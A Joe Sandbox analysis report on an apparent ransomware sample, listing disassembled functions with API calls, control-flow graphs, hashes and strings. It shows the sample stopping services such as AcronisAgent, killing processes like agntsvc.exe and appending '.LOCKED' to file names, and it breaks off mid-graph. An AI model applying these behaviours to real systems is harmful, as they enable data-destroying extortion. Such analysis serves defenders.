                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                  • String ID:
                                  • API String ID: 3038321057-0
                                  • Opcode ID: 06a851e81e587e60b3d131955049e4033930d5e45d9b9c7f16665a8112e3f05d
                                  • Instruction ID: 2fb47ba63f868eca357eb8dc3280b2c14bc0986494e0d61f8e91a3433002d726
                                  • Opcode Fuzzy Hash: 06a851e81e587e60b3d131955049e4033930d5e45d9b9c7f16665a8112e3f05d
                                  • Instruction Fuzzy Hash: E4017C75A0010CBFDB208B92DC89EEF7FBDEB85751F104125F901E6100DB708E468BA0
                                  Function 005CABD1 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000003), ref: 005CABE6
                                  • MessageBoxA.USER32(00000000,00000000,006CAB4A,00000010), ref: 005CAEA6
                                  • ExitProcess.KERNEL32 ref: 005CAEAE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExitInfoLocaleMessageProcess
                                  • String ID: Xqvxssruwhg#orfdoh
                                  • API String ID: 4204081468-3373961006
                                  • Opcode ID: 721535f3040188a4822d97a17805cc82b019675534224092e3812f487efcfc78
                                  • Instruction ID: a7bab913e2cebc648827e9338995e55a6c3f089b55090df297184bcb081c40f6
                                  • Opcode Fuzzy Hash: 721535f3040188a4822d97a17805cc82b019675534224092e3812f487efcfc78
                                  • Instruction Fuzzy Hash: ADB19621E0A2C8DFDF11DBEC90819DDBFB1AF36348F045089E4907B247D264565BD76A
                                  Function 005C8C94 Relevance: 4.6, APIs: 3, Instructions: 65threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemInfo.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,005C5A97), ref: 005C8CAC
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                    • Part of subcall function 005C712C: EnterCriticalSection.KERNEL32(006D9A1C,00000001,00000000,005C8CEC,00000001,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7131
                                    • Part of subcall function 005C712C: LeaveCriticalSection.KERNEL32(006D9A1C,?,?,?,?,?,?,?,?,005C5A97), ref: 005C7169
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00007E38,00000000,00000000,00000000), ref: 005C8D13
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000812D,00000001,00000000,00000000), ref: 005C8D40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CreateCriticalSectionThread$AllocateEnterHeapInfoLeaveSystem
                                  • String ID:
                                  • API String ID: 1358061742-0
                                  • Opcode ID: 41d8f5e6ca51a11c6cac2565d6ef0429bf987f51060ff4f47a146a50f75355f0
                                  • Instruction ID: 3525988929123b93ea959b90424c1f30b2bc1182469a99a0f1045385334a9687
                                  • Opcode Fuzzy Hash: 41d8f5e6ca51a11c6cac2565d6ef0429bf987f51060ff4f47a146a50f75355f0
                                  • Instruction Fuzzy Hash: 00119AB69011256FCB14AFA5EC59E6A7FAFFB55704704152FE503D7250DB309801CB70
                                  Function 005C9F53 Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                  • FindClose.KERNEL32(00000000), ref: 005C9F70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID:
                                  • API String ID: 2295610775-0
                                  • Opcode ID: fac44f3baac0955660c7da4f9b995ef03869ad5e5ebf263314a80544be48d056
                                  • Instruction ID: ecff157c96a21cadf886fe2a392cc6b426634b4e475ef5a0409cf8fc6795fed0
                                  • Opcode Fuzzy Hash: fac44f3baac0955660c7da4f9b995ef03869ad5e5ebf263314a80544be48d056
                                  • Instruction Fuzzy Hash: 8DD05E359209086BDB209BB8AC9EAAA77ACA78131EF040794E426E11D0D638D9868A54
                                  Function 005CB49B Relevance: 77.3, APIs: 12, Strings: 32, Instructions: 286serviceCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 953 5cb49b-5cb4c7 GetTickCount OpenSCManagerW 954 5cb4cd-5cb4e6 call 5c1000 953->954 955 5cb872-5cb877 953->955 958 5cb4ec-5cb4f8 954->958 959 5cb865-5cb86c CloseServiceHandle 954->959 960 5cb85c-5cb864 call 5c10b9 958->960 961 5cb4fe-5cb507 958->961 959->955 960->959 963 5cb509-5cb518 OpenServiceW 961->963 965 5cb51a-5cb520 GetLastError 963->965 966 5cb525-5cb53e QueryServiceStatusEx 963->966 969 5cb839-5cb854 965->969 967 5cb82d-5cb836 CloseServiceHandle 966->967 968 5cb544-5cb54b 966->968 967->969 968->967 970 5cb551-5cb558 968->970 969->963 971 5cb85a 969->971 970->967 972 5cb55e-5cb579 EnumDependentServicesW 970->972 971->960 973 5cb57f-5cb58a GetLastError 972->973 974 5cb736-5cb73f call 5cb415 972->974 973->974 975 5cb590-5cb59d call 5c5c2d 973->975 974->967 980 5cb745-5cb7ab 974->980 975->974 981 5cb5a3-5cb5bd EnumDependentServicesW 975->981 982 5cb7ad-5cb7b6 980->982 983 5cb72e-5cb731 call 5c5cd2 981->983 984 5cb5c3-5cb5e9 OpenServiceW 981->984 982->982 985 5cb7b8-5cb800 982->985 983->974 987 5cb5ef-5cb5f8 call 5cb415 984->987 988 5cb728-5cb72b 984->988 989 5cb803-5cb814 985->989 995 5cb5fe-5cb68d 987->995 996 5cb721-5cb722 CloseServiceHandle 987->996 988->983 989->989 991 5cb816-5cb822 call 5d1c06 989->991 994 5cb827-5cb82a 991->994 994->967 997 5cb690-5cb6a1 995->997 996->988 997->997 998 5cb6a3-5cb6ee 997->998 999 5cb6f1-5cb702 998->999 999->999 1000 5cb704-5cb71e call 5d1c06 999->1000 1000->996
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 005CB4A6
                                  • OpenSCManagerW.SECHOST(00000000,00000000,000F003F), ref: 005CB4BA
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                  • OpenServiceW.ADVAPI32(00000000,00000000,0000002C,00000000), ref: 005CB50D
                                  • GetLastError.KERNEL32 ref: 005CB51A
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,005C599D), ref: 005CB536
                                  • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,005C599D,?), ref: 005CB571
                                  • GetLastError.KERNEL32 ref: 005CB57F
                                  • EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,005C599D,005C599D,?), ref: 005CB5B5
                                  • OpenServiceW.ADVAPI32(?,?,00000024), ref: 005CB5DF
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 005CB722
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 005CB866
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Service$Openlstrlen$CloseDependentEnumErrorHandleLastServices$CountManagerQueryStatusTick
                                  • String ID: "$$$&$($-$5$7D0D+D4D4D!D DD$8$8KWH\$=$=$AcronisAgent$B$D7+4 $K$K8L8W8H8H8]8\88$[$j$k$k$k$m$m$n$q$q$z${${$}$}$~
                                  • API String ID: 3449900727-1055701911
                                  • Opcode ID: 9c20ca076d25fe512811145a74de3479a5e6f4abd19204759f9d77369bdc1b69
                                  • Instruction ID: 4fe442ebe86eb3be6b62d57cf69e2ed346c28823ab2d9468640831293d6d1bf4
                                  • Opcode Fuzzy Hash: 9c20ca076d25fe512811145a74de3479a5e6f4abd19204759f9d77369bdc1b69
                                  • Instruction Fuzzy Hash: F0D11B70D082D89EEF12CBE8D8487DDBFB56F16304F58409DD5847B282CBB94A49CB66
                                  Function 005CB21B Relevance: 61.4, APIs: 7, Strings: 28, Instructions: 140processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1028 5cb21b-5cb233 call 5c1000 1031 5cb239-5cb260 CreateToolhelp32Snapshot Process32FirstW 1028->1031 1032 5cb413-5cb414 1028->1032 1033 5cb266 1031->1033 1034 5cb403-5cb412 CloseHandle call 5c10b9 1031->1034 1035 5cb267-5cb27d call 5c10f6 1033->1035 1034->1032 1040 5cb3ec-5cb3fc Process32NextW 1035->1040 1041 5cb283-5cb297 OpenProcess 1035->1041 1040->1035 1042 5cb402 1040->1042 1041->1040 1043 5cb29d-5cb2a8 TerminateProcess 1041->1043 1042->1034 1044 5cb2ae-5cb341 1043->1044 1045 5cb3e5-5cb3e6 CloseHandle 1043->1045 1046 5cb343-5cb34b 1044->1046 1045->1040 1046->1046 1047 5cb34d-5cb3ad 1046->1047 1048 5cb3b1-5cb3c2 1047->1048 1048->1048 1049 5cb3c4-5cb3e2 call 5d1c06 1048->1049 1049->1045
                                  APIs
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,00000000), ref: 005CB23E
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 005CB258
                                  • CloseHandle.KERNEL32(00000000), ref: 005CB404
                                    • Part of subcall function 005C10F6: lstrcmpiW.KERNEL32(?,00000000,00000000,75920880,00000000,006D99B4,?,005C847E), ref: 005C1116
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 005CB28D
                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 005CB2A0
                                  • CloseHandle.KERNEL32(00000000), ref: 005CB3E6
                                  • Process32NextW.KERNEL32(00000000,?), ref: 005CB3F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrlen$CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32lstrcmpi
                                  • String ID: !$!$&$&$)$*$;$Q$`$`$a$agntsvc.exe$d$d$f$h$k$l$m$p$q$q$s$t$t$t$v$w
                                  • API String ID: 2831976363-435690770
                                  • Opcode ID: a0811d4805a56ed85e26db3c68789707ca4418db58e725d5eb1d5d59431d08c9
                                  • Instruction ID: f13159e5ff01e4554a2b476040b743da7e3a315189c9b96c8120119782999e07
                                  • Opcode Fuzzy Hash: a0811d4805a56ed85e26db3c68789707ca4418db58e725d5eb1d5d59431d08c9
                                  • Instruction Fuzzy Hash: 6C61F6209082C9ADEF12C7A8D84D7DEBFB55F26308F084098D8847A283D7FB5649C776
                                  Function 005C7E38 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 217sleepwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1219 5c7e38-5c7e53 call 5c5c2d 1222 5c811e-5c812a call 5c1a1a 1219->1222 1223 5c7e59-5c7e68 call 5c5c2d 1219->1223 1223->1222 1228 5c7e6e-5c7e7d call 5c5c2d 1223->1228 1228->1222 1231 5c7e83-5c7e8a 1228->1231 1232 5c7e8b-5c7e92 1231->1232 1233 5c7e98-5c7ea9 call 5c7234 1232->1233 1234 5c8076-5c807c Sleep 1232->1234 1243 5c7eaf-5c7ec4 InterlockedIncrement call 5c1a4d 1233->1243 1244 5c8073 1233->1244 1235 5c807e-5c808d call 5c7277 1234->1235 1236 5c80bf-5c80c6 1234->1236 1248 5c808f-5c809e call 5c7277 1235->1248 1249 5c80b4 1235->1249 1240 5c80c8-5c80cf 1236->1240 1241 5c80bb-5c80bd Sleep 1236->1241 1245 5c811c-5c811d 1240->1245 1246 5c80d1-5c80d8 1240->1246 1241->1236 1254 5c7ec9-5c7ecb 1243->1254 1244->1234 1245->1222 1246->1232 1247 5c80de-5c80ea call 5c73f4 1246->1247 1247->1232 1259 5c80f0-5c80fc call 5c73f4 1247->1259 1248->1249 1260 5c80a0-5c80af call 5c7277 1248->1260 1253 5c80b6-5c80b9 1249->1253 1253->1236 1257 5c7ecd-5c7ed0 1254->1257 1258 5c7f09 1254->1258 1262 5c7f02-5c7f07 1257->1262 1263 5c7ed2-5c7ed5 1257->1263 1261 5c7f0e 1258->1261 1259->1232 1277 5c8102-5c810e call 5c73f4 1259->1277 1260->1249 1278 5c80b1-5c80b2 1260->1278 1266 5c7f11-5c7f18 1261->1266 1262->1261 1267 5c7efb-5c7f00 1263->1267 1268 5c7ed7-5c7eda 1263->1268 1273 5c7f1e-5c7f24 1266->1273 1274 5c8045-5c8047 call 5c5cd2 1266->1274 1267->1261 1269 5c7edc-5c7edf 1268->1269 1270 5c7ef4-5c7ef9 1268->1270 1275 5c7eed-5c7ef2 1269->1275 1276 5c7ee1-5c7ee4 1269->1276 1270->1261 1280 5c7f99-5c7fa0 call 5d1b3f 1273->1280 1281 5c7f26-5c7f53 EnterCriticalSection call 5ca04f 1273->1281 1284 5c804c-5c8057 InterlockedDecrement 1274->1284 1275->1261 1276->1266 1282 5c7ee6-5c7eeb 1276->1282 1277->1232 1291 5c8114-5c8116 1277->1291 1278->1253 1280->1274 1294 5c7fa6-5c7fad 1280->1294 1295 5c7f8a-5c7f93 LeaveCriticalSection 1281->1295 1296 5c7f55-5c7f58 1281->1296 1282->1261 1288 5c805d-5c8064 1284->1288 1292 5c8059-5c805b Sleep 1288->1292 1293 5c8066-5c806d 1288->1293 1291->1232 1291->1245 1292->1288 1293->1233 1293->1244 1297 5c7faf-5c7fb6 1294->1297 1298 5c7ff9-5c8000 call 5c5cd2 1294->1298 1295->1280 1299 5c7f5a-5c7f63 call 5ca04f 1296->1299 1297->1298 1302 5c7fb8-5c7ff7 EnterCriticalSection PostMessageW * 2 LeaveCriticalSection 1297->1302 1305 5c8005-5c800c 1298->1305 1308 5c7f7d-5c7f82 1299->1308 1309 5c7f65-5c7f74 call 5c5c3d 1299->1309 1302->1305 1306 5c800e-5c8015 1305->1306 1307 5c803a-5c8043 Sleep call 5c9f0e 1305->1307 1306->1307 1311 5c8017-5c8034 EnterCriticalSection PostMessageW LeaveCriticalSection 1306->1311 1307->1284 1308->1299 1312 5c7f84-5c7f87 1308->1312 1309->1308 1316 5c7f76-5c7f7a 1309->1316 1311->1307 1312->1295 1316->1308
                                  APIs
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • Sleep.KERNEL32(00000001), ref: 005C8078
                                    • Part of subcall function 005C7234: EnterCriticalSection.KERNEL32(006D9A1C,00000000,006D9A1C,005C81BD), ref: 005C7239
                                    • Part of subcall function 005C7234: LeaveCriticalSection.KERNEL32(006D9A1C), ref: 005C726C
                                  • InterlockedIncrement.KERNEL32(006D9A3C), ref: 005C7EB4
                                    • Part of subcall function 005C1A4D: GetFileAttributesW.KERNEL32(00000000,75920F00,00000000,00000000), ref: 005C1A7F
                                    • Part of subcall function 005C1A4D: SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1A97
                                    • Part of subcall function 005C1A4D: SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1AAA
                                    • Part of subcall function 005C1A4D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1ABE
                                    • Part of subcall function 005C1A4D: GetLastError.KERNEL32 ref: 005C1ACA
                                    • Part of subcall function 005C1A4D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1AFB
                                  • EnterCriticalSection.KERNEL32(012FFC04), ref: 005C7F30
                                  • LeaveCriticalSection.KERNEL32(?), ref: 005C7F8D
                                  • EnterCriticalSection.KERNEL32(006DA3EC), ref: 005C7FBD
                                  • PostMessageW.USER32(0000069C,00000000,success), ref: 005C7FD0
                                  • PostMessageW.USER32(00000405,00000000,00000000), ref: 005C7FE5
                                  • LeaveCriticalSection.KERNEL32(006DA3EC), ref: 005C7FF1
                                  • EnterCriticalSection.KERNEL32(006DA3EC), ref: 005C8018
                                  • PostMessageW.USER32(0000069B,00000000,00000000), ref: 005C802D
                                  • LeaveCriticalSection.KERNEL32(006DA3EC), ref: 005C8034
                                  • Sleep.KERNEL32(00000001), ref: 005C803C
                                  • InterlockedDecrement.KERNEL32(006D9A3C), ref: 005C8051
                                  • Sleep.KERNEL32(0000000A), ref: 005C805B
                                  • Sleep.KERNEL32(0000000A), ref: 005C80BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$File$EnterLeaveSleep$AttributesMessagePost$CreateInterlocked$AllocateDecrementErrorHeapIncrementLast
                                  • String ID: :$already$corrupt$no access$out of memory$success$too small
                                  • API String ID: 3985374689-3599528794
                                  • Opcode ID: 4036f577c8ed112605375678c547962a438aa14c4495e3029fce93fac63ebc41
                                  • Instruction ID: 0d87dc9e79b851fb45b448e95785708f4d8f3d710e4c9975f40c549542ccaf61
                                  • Opcode Fuzzy Hash: 4036f577c8ed112605375678c547962a438aa14c4495e3029fce93fac63ebc41
                                  • Instruction Fuzzy Hash: 4771E732D0460A9FCB20AFF48C59F697EAABB49700F15152EE501AA691DF708C41CFA1
                                  Function 005C173D Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 232stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1317 5c173d-5c1740 1318 5c174d-5c1755 call 5ca05f 1317->1318 1319 5c1742-5c174b 1317->1319 1322 5c175a-5c175d call 5c9f53 1318->1322 1319->1318 1321 5c173b 1319->1321 1321->1317 1324 5c1762-5c1764 1322->1324 1325 5c17c9-5c17d7 call 5c9ff2 1324->1325 1326 5c1766-5c1796 1324->1326 1330 5c17dc-5c17df 1325->1330 1327 5c1799-5c17aa 1326->1327 1327->1327 1329 5c17ac-5c17c8 GetEnvironmentVariableW call 5ca05f 1327->1329 1329->1325 1332 5c1860-5c18f9 call 5c5595 call 5c159b call 5c5595 call 5c159b 1330->1332 1333 5c17e1-5c1821 call 5c7c96 call 5c42e5 call 5d2cc0 1330->1333 1354 5c18fc-5c190f 1332->1354 1347 5c183f-5c1843 call 5c5c85 1333->1347 1348 5c1823-5c183e call 5d2d50 call 5d3000 1333->1348 1355 5c1848-5c1853 call 5c9fa1 1347->1355 1348->1347 1354->1354 1357 5c1911-5c1946 lstrcpyW lstrcatW 1354->1357 1361 5c1858-5c185b call 5c5cd2 1355->1361 1360 5c1949-5c195a 1357->1360 1360->1360 1362 5c195c-5c196c lstrcatW 1360->1362 1361->1332 1364 5c1972-5c1980 lstrlenA 1362->1364 1365 5c19f3-5c19fa 1362->1365 1364->1365 1366 5c1982-5c19a6 1364->1366 1367 5c19a9-5c19bc 1366->1367 1367->1367 1368 5c19be-5c19ed lstrcatW MultiByteToWideChar 1367->1368 1368->1365
                                  APIs
                                  • GetEnvironmentVariableW.KERNEL32(&r7r?r"rr), ref: 005C17B5
                                  • lstrcpyW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,?), ref: 005C191E
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,391467B9-BD4E-2B74-71A6-03A3DA3DE322), ref: 005C192C
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,00000014), ref: 005C1964
                                  • lstrlenA.KERNEL32(LOCKED), ref: 005C1978
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,?), ref: 005C19C6
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,OCKED,000000FF,LOCKED,00000007), ref: 005C19ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcat$ByteCharEnvironmentMultiVariableWidelstrcpylstrlen
                                  • String ID: noj~u}7}vy$&r7r?r"rr$.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED$391467B9-BD4E-2B74-71A6-03A3DA3DE322$5$LOCKED$P$=$_$i$i$i$r&?r$*
                                  • API String ID: 2867850816-1516431644
                                  • Opcode ID: 874f60a6edb963da0c5dfcb14898dcbbd54b7964059e61b6bb987889ffabba49
                                  • Instruction ID: 57eb4db286620525cc91689ab08cea0ff43101987b90c6c7e07d809cc4c51996
                                  • Opcode Fuzzy Hash: 874f60a6edb963da0c5dfcb14898dcbbd54b7964059e61b6bb987889ffabba49
                                  • Instruction Fuzzy Hash: DE81F520E04289AEDF11DFE89854AEEBFBABFA6304F14405EE444A7343C6745B46CB65
                                  Function 005C6336 Relevance: 27.2, APIs: 18, Instructions: 182timethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1369 5c6336-5c6356 CreateTimerQueue 1370 5c6358-5c635a ExitThread 1369->1370 1371 5c6360-5c6380 GetQueuedCompletionStatus 1369->1371 1372 5c6386-5c6389 1371->1372 1373 5c64d0-5c64d7 call 5c618d 1371->1373 1375 5c638f-5c6397 1372->1375 1376 5c6457-5c645a 1372->1376 1382 5c64dd call 5c629a 1373->1382 1383 5c6580-5c6589 DeleteTimerQueue 1373->1383 1377 5c6399-5c63b6 setsockopt 1375->1377 1378 5c63f6-5c63f9 1375->1378 1379 5c650b-5c650e 1376->1379 1380 5c6460-5c6470 1376->1380 1377->1378 1384 5c63b8-5c63da getsockopt 1377->1384 1388 5c63fd-5c6404 1378->1388 1379->1371 1387 5c6514-5c651b 1379->1387 1385 5c64cc-5c64ce 1380->1385 1386 5c6472 1380->1386 1397 5c64e2-5c64fe CreateTimerQueueTimer 1382->1397 1384->1378 1390 5c63dc-5c63e0 1384->1390 1385->1373 1395 5c648f-5c64ab shutdown closesocket 1385->1395 1391 5c6486-5c6488 1386->1391 1392 5c651d-5c6525 1387->1392 1393 5c6576-5c657e 1387->1393 1388->1371 1394 5c640a-5c640c 1388->1394 1390->1378 1398 5c63e2-5c63f4 call 5c60e1 1390->1398 1399 5c648a 1391->1399 1400 5c6474-5c6478 1391->1400 1392->1383 1401 5c6527-5c652b 1392->1401 1393->1383 1396 5c653f-5c655b shutdown 